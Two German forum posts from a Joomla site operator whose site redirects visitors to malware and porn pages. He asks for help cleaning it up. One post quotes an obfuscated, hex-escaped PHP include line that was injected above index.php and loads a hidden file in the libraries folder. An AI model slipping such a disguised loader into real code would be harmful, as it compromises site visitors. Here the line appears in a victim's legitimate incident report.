Beiträge von ITA-Marketing

Hallo Frank,

danke für die Anteilnahme und den Link. Die aktuelle Version ist 3.6... wenn ich nicht irre. Kann konkret ja nicht nachsehen, da ich nur FTP Zugriff habe. Bin dabei die Dateien zu vergleichen. Normal beginnt die index.php ja mit:
"/**
* @package Joomla.Site
*
* @copyright Copyright (C) 2005 - 2015 Open Source Matters, Inc. All rights reserved.
* @license GNU General Public License version 2 or later; see LICENSE.txt
*/"
Darüber finde ich nun eine neu Zeile:
"include "\x2fhom\x65/st\x72ato\x2fhtt\x70/pr\x65miu\x6d/ri\x64/24\x2f89/\x35371\x32489\x2fhtd\x6fcs/\x6cibr\x61rie\x73/fo\x66/da\x74aba\x73e/c\x6fde.\x70hp";"

Damit kann ich echt nix anfangen! Oder gibt es eine Erweiterung, die mir entgangen ist?

Gruß
Wolfgang

Hallo,

habe mich hier im Forum angemeldet, in der Hoffnung einige Hinweise zu bekommen. Ich betreue eine Business-Seite, wo Links nach Google-Suche ebenfalls weitergeleitet werden. Es gibt dazu massive Hinweise von Usern und Kunden. Ich selbst habe das erst festgestellt, nachdem ich den Test mit bereinigten Browsern vorgenommen habe. Dabei erfolgt die Umleitung einmal auf eine RU-Seite mit Malware (win.mobile.installs.com) und zweitens auf eine RU-Pornoseite. Den letzteren Link erspare ich mir. Zur Sicherheit von User und Kunden habe ich das gesamte System offline genommen und ein klassische HTML-Seite vorgeschaltet. Gibt es außer den bereits geschilderten Ansätzen weitere Hinweise? Joomla selbst sagt mir, dass die aktuelle Version installiert ist. Allerdings sind noch 2 Drittanbieter-Module offen (ARI und Gästebuch).

Danke und Gruß
Wolfgang